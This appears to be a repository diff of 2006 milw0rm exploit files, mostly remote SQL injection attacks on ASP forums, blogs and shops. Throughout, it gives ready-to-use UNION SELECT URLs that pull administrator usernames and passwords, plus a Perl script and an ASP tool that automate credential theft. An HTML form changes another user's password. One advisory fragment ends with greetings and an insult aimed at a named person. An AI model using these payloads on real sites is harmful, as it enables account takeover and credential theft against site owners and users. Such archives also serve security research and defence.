| 9/2/06 - Vendor Replied. Threatens legal action. |
|
||||
| 9/4/06 - Exploit Released with no details to vendor. |
|
||||
+-----------------------------------------------------------------+
|
||||
| SHOUTZ |
|
||||
+-----------------------------------------------------------------+
|
||||
| Everyone at g00ns.net - including: |
|
||||
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
|
||||
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
|
||||
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
|
||||
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
|
||||
+-----------------------------------------------------------------+
|
||||
| ADDITIONAL NOTES |
|
||||
+-----------------------------------------------------------------+
|
||||
| TeamSpeak: ts.g00ns.net |
|
||||
| IRC: irc.g00ns.net |
|
||||
+-----------------------------------------------------------------+
|
||||
| PERSONAL STUFF |
|
||||
+-----------------------------------------------------------------+
|
||||
| Sess from g00ns.net IS A FUCKING MORON. |
|
||||
+-----------------------------------------------------------------+
|
||||
|
||||
__
|
||||
___ ___ / _|
|
||||
/ _ \/ _ \| |_
|
||||
| __/ (_) | _|
|
||||
\___|\___/|_|.
|
||||
|
||||
# milw0rm.com [2006-09-04]
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
################################################################################
|
||||
## ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
##########################################################################################################################################################
|
||||
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
|
||||
##########################################################################################################################################################
|
||||
|
||||
##########################################################################################################################################################
|
||||
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
|
||||
##########################################################################################################################################################
|
||||
|
||||
################################################################
|
||||
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
|
||||
################################################################
|
||||
|
||||
# milw0rm.com [2006-09-05]
|
||||
################################################################################
|
||||
## ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
##########################################################################################################################################################
|
||||
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
|
||||
##########################################################################################################################################################
|
||||
|
||||
##########################################################################################################################################################
|
||||
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
|
||||
##########################################################################################################################################################
|
||||
|
||||
################################################################
|
||||
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
|
||||
################################################################
|
||||
|
||||
# milw0rm.com [2006-09-05]
|
||||
|
|
|
@ -1,13 +1,13 @@
|
|||
# BiyoSecurity.Org
|
||||
# script name : TualBLOG v 1.0
|
||||
# Risk : High
|
||||
# Regards : Dj ReMix
|
||||
# Thanks : Korsan , Liz0zim
|
||||
# Vulnerable file : icerik.asp
|
||||
|
||||
exp :
|
||||
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
|
||||
|
||||
uyeno = 1 or 2( Admin ID )
|
||||
|
||||
# milw0rm.com [2006-09-13]
|
||||
# BiyoSecurity.Org
|
||||
# script name : TualBLOG v 1.0
|
||||
# Risk : High
|
||||
# Regards : Dj ReMix
|
||||
# Thanks : Korsan , Liz0zim
|
||||
# Vulnerable file : icerik.asp
|
||||
|
||||
exp :
|
||||
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
|
||||
|
||||
uyeno = 1 or 2( Admin ID )
|
||||
|
||||
# milw0rm.com [2006-09-13]
|
||||
|
|
|
@ -1,21 +1,21 @@
|
|||
Vulnerability Report
|
||||
*******************************************************************************
|
||||
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : ajann
|
||||
|
||||
# Script Page : http://quadcomm.com
|
||||
|
||||
# Exploit;
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
|
||||
|
||||
Example:
|
||||
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
|
||||
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# milw0rm.com [2006-09-17]
|
||||
Vulnerability Report
|
||||
*******************************************************************************
|
||||
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : ajann
|
||||
|
||||
# Script Page : http://quadcomm.com
|
||||
|
||||
# Exploit;
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
|
||||
|
||||
Example:
|
||||
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
|
||||
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# milw0rm.com [2006-09-17]
|
||||
|
|
|
@ -1,28 +1,28 @@
|
|||
*******************************************************************************
|
||||
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : ajann
|
||||
|
||||
# Dork : faqview.asp?key
|
||||
|
||||
# Script Page : http://www.t-dreams.com
|
||||
|
||||
# Exploit;
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
|
||||
|
||||
Example:
|
||||
|
||||
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
|
||||
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
|
||||
|
||||
With admin username and password take it,after join to login page:
|
||||
../[path]/admin/
|
||||
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-09-17]
|
||||
*******************************************************************************
|
||||
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : ajann
|
||||
|
||||
# Dork : faqview.asp?key
|
||||
|
||||
# Script Page : http://www.t-dreams.com
|
||||
|
||||
# Exploit;
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
|
||||
|
||||
Example:
|
||||
|
||||
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
|
||||
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
|
||||
|
||||
With admin username and password take it,after join to login page:
|
||||
../[path]/admin/
|
||||
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-09-17]
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
*******************************************************************************
|
||||
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : ajann
|
||||
|
||||
# Script Page : http://www.t-dreams.com
|
||||
|
||||
# Exploit;
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
|
||||
|
||||
Example:
|
||||
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
|
||||
|
||||
Pls UserID Change(1,2,3,4,5.....)
|
||||
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
# Im not [Turkish]Hacker!
|
||||
|
||||
# milw0rm.com [2006-09-17]
|
||||
*******************************************************************************
|
||||
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : ajann
|
||||
|
||||
# Script Page : http://www.t-dreams.com
|
||||
|
||||
# Exploit;
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
|
||||
|
||||
Example:
|
||||
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
|
||||
|
||||
Pls UserID Change(1,2,3,4,5.....)
|
||||
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
# Im not [Turkish]Hacker!
|
||||
|
||||
# milw0rm.com [2006-09-17]
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
|
||||
+ Author : Fix TR +
|
||||
+ Site : www.hack.gen.tr +
|
||||
+ Contact : fixtr[at]bsdmail.com +
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
+ Download: http://www.aspindir.com/goster/4425
|
||||
+ Version : 1.0
|
||||
+ Bug In : uye_profil.asp
|
||||
+ Risk : High
|
||||
|
||||
|
||||
+ Exp.
|
||||
|
||||
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
|
||||
|
||||
# milw0rm.com [2006-09-19]
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
|
||||
+ Author : Fix TR +
|
||||
+ Site : www.hack.gen.tr +
|
||||
+ Contact : fixtr[at]bsdmail.com +
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
+ Download: http://www.aspindir.com/goster/4425
|
||||
+ Version : 1.0
|
||||
+ Bug In : uye_profil.asp
|
||||
+ Risk : High
|
||||
|
||||
|
||||
+ Exp.
|
||||
|
||||
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
|
||||
|
||||
# milw0rm.com [2006-09-19]
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : Muhacir
|
||||
|
||||
# Source : http://www.aspindir.com/goster/4386
|
||||
|
||||
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
|
||||
|
||||
# Greetz To : str0ke :)
|
||||
|
||||
# milw0rm.com [2006-09-22]
|
||||
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
|
||||
|
||||
# Author : Muhacir
|
||||
|
||||
# Source : http://www.aspindir.com/goster/4386
|
||||
|
||||
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
|
||||
|
||||
# Greetz To : str0ke :)
|
||||
|
||||
# milw0rm.com [2006-09-22]
|
||||
|
|
|
@ -1,46 +1,46 @@
|
|||
#!usr/bin/perl
|
||||
|
||||
#Author : gega
|
||||
#Google : "Spidey Blog Script (c) v1.5"
|
||||
#SpideyBlog 1.5 Sql Injection Exploit
|
||||
#Author Mail : gega.tr[at]gmail[dot]com
|
||||
#Powered by e-hack.org
|
||||
#Vulnerability by Asianeagle.
|
||||
#Vulnerability Link : http://milw0rm.com/exploits/2186
|
||||
|
||||
use LWP::Simple;
|
||||
|
||||
print "\n==============================\n";
|
||||
print "== Spidey Blog v1.5 ==\n";
|
||||
print "== Sql Injection Exploit ==\n";
|
||||
print "== Author : gega ==\n";
|
||||
print "==============================\n\n";
|
||||
|
||||
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
|
||||
{
|
||||
print "Usage : perl $0 [path] [function]\n";
|
||||
print "path ==> http://www.example.com/blog/\n";
|
||||
print "function ==> nick OR password\n";
|
||||
print "Example : perl $0 http://site.org/blog/ nick\n";
|
||||
exit(0);
|
||||
}
|
||||
else
|
||||
{
|
||||
if($ARGV[1] eq 'nick'){
|
||||
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
|
||||
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
|
||||
print "[+] Connected to: $ARGV[0]\n";
|
||||
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
|
||||
print "[-] Unable to retrieve username\n" if(!$1); }
|
||||
else {
|
||||
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
|
||||
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
|
||||
print "[+] Connected to: $ARGV[0]\n";
|
||||
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
|
||||
print "[-] Unable to retrieve password\n" if(!$1);
|
||||
}
|
||||
}
|
||||
|
||||
#To Be Or Not To Be!
|
||||
|
||||
# milw0rm.com [2006-09-24]
|
||||
#!usr/bin/perl
|
||||
|
||||
#Author : gega
|
||||
#Google : "Spidey Blog Script (c) v1.5"
|
||||
#SpideyBlog 1.5 Sql Injection Exploit
|
||||
#Author Mail : gega.tr[at]gmail[dot]com
|
||||
#Powered by e-hack.org
|
||||
#Vulnerability by Asianeagle.
|
||||
#Vulnerability Link : http://milw0rm.com/exploits/2186
|
||||
|
||||
use LWP::Simple;
|
||||
|
||||
print "\n==============================\n";
|
||||
print "== Spidey Blog v1.5 ==\n";
|
||||
print "== Sql Injection Exploit ==\n";
|
||||
print "== Author : gega ==\n";
|
||||
print "==============================\n\n";
|
||||
|
||||
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
|
||||
{
|
||||
print "Usage : perl $0 [path] [function]\n";
|
||||
print "path ==> http://www.example.com/blog/\n";
|
||||
print "function ==> nick OR password\n";
|
||||
print "Example : perl $0 http://site.org/blog/ nick\n";
|
||||
exit(0);
|
||||
}
|
||||
else
|
||||
{
|
||||
if($ARGV[1] eq 'nick'){
|
||||
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
|
||||
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
|
||||
print "[+] Connected to: $ARGV[0]\n";
|
||||
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
|
||||
print "[-] Unable to retrieve username\n" if(!$1); }
|
||||
else {
|
||||
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
|
||||
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
|
||||
print "[+] Connected to: $ARGV[0]\n";
|
||||
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
|
||||
print "[-] Unable to retrieve password\n" if(!$1);
|
||||
}
|
||||
}
|
||||
|
||||
#To Be Or Not To Be!
|
||||
|
||||
# milw0rm.com [2006-09-24]
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
|
||||
+ Author : Fix TR +
|
||||
+ Site : www.hack.gen.tr +
|
||||
+ Contact : fixtr[at]bsdmail.com +
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
|
||||
Download & Info: http://www.aspindir.com/Goster/2981
|
||||
Bug In : uye_ayrinti.asp
|
||||
Risk : High
|
||||
|
||||
Exp:
|
||||
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
|
||||
|
||||
Password encrytped with SHA-256
|
||||
|
||||
# milw0rm.com [2006-09-24]
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
|
||||
+ Author : Fix TR +
|
||||
+ Site : www.hack.gen.tr +
|
||||
+ Contact : fixtr[at]bsdmail.com +
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
|
||||
Download & Info: http://www.aspindir.com/Goster/2981
|
||||
Bug In : uye_ayrinti.asp
|
||||
Risk : High
|
||||
|
||||
Exp:
|
||||
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
|
||||
|
||||
Password encrytped with SHA-256
|
||||
|
||||
# milw0rm.com [2006-09-24]
|
||||
|
|
|
@ -1,38 +1,38 @@
|
|||
<!--
|
||||
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
|
||||
# Author : ajann
|
||||
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
|
||||
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
|
||||
|
||||
[Code]]]
|
||||
-->
|
||||
<html>
|
||||
<body bgcolor="#000000">
|
||||
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
|
||||
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
|
||||
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
|
||||
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
|
||||
<input type="text" name="Passe" size="30" value="123456"> <br>
|
||||
<input type="submit" value="Submit" name="Envoyer">
|
||||
<input type="reset" value="Cancel" name="Effacer">
|
||||
<input type="hidden" name="Id" value="42">
|
||||
<input type="hidden" name="Nom" value="Administrateur"></p>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
[/Code]]]
|
||||
|
||||
Change: <input type="hidden" name="Id" value="42"> => ID
|
||||
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
|
||||
|
||||
Next to admin.asp
|
||||
|
||||
#ajann,Turkey
|
||||
#...
|
||||
|
||||
#Im Not Hacker!
|
||||
-->
|
||||
|
||||
# milw0rm.com [2006-10-18]
|
||||
<!--
|
||||
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
|
||||
# Author : ajann
|
||||
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
|
||||
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
|
||||
|
||||
[Code]]]
|
||||
-->
|
||||
<html>
|
||||
<body bgcolor="#000000">
|
||||
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
|
||||
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
|
||||
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
|
||||
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
|
||||
<input type="text" name="Passe" size="30" value="123456"> <br>
|
||||
<input type="submit" value="Submit" name="Envoyer">
|
||||
<input type="reset" value="Cancel" name="Effacer">
|
||||
<input type="hidden" name="Id" value="42">
|
||||
<input type="hidden" name="Nom" value="Administrateur"></p>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
[/Code]]]
|
||||
|
||||
Change: <input type="hidden" name="Id" value="42"> => ID
|
||||
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
|
||||
|
||||
Next to admin.asp
|
||||
|
||||
#ajann,Turkey
|
||||
#...
|
||||
|
||||
#Im Not Hacker!
|
||||
-->
|
||||
|
||||
# milw0rm.com [2006-10-18]
|
||||
|
|
|
@ -1,189 +1,189 @@
|
|||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum <=</b>v1.4(index.php) <u><b>
|
||||
Blind SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="/index.php?consult=1&indMemo="
|
||||
string2="-1%20union select%20"
|
||||
string3="mdp%20"
|
||||
string4="from%20"
|
||||
string5="membre%20"
|
||||
string6="where%20"
|
||||
string7="ind like%20"
|
||||
string8=Request.Form("id")
|
||||
string9="/index.php?consult=1&indMemo="
|
||||
string10="-1%20union select%20"
|
||||
string11="nom%20"
|
||||
string12="from%20"
|
||||
string13="membre%20"
|
||||
string14="where%20"
|
||||
string15="ind like%20"
|
||||
string16=Request.Form("id")
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
|
||||
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "GET" , come, FALSE
|
||||
.sEnd
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
get_password = take(target2)
|
||||
|
||||
getdata=InStr(get_username,"""720"" valign=""top"">" )
|
||||
username=Mid(get_username,getdata+19,20)
|
||||
passwd=Mid(get_password,getdata+19,20)
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">User Name:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial"> User Password:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-10-24]
|
||||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'===============================================================================================
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
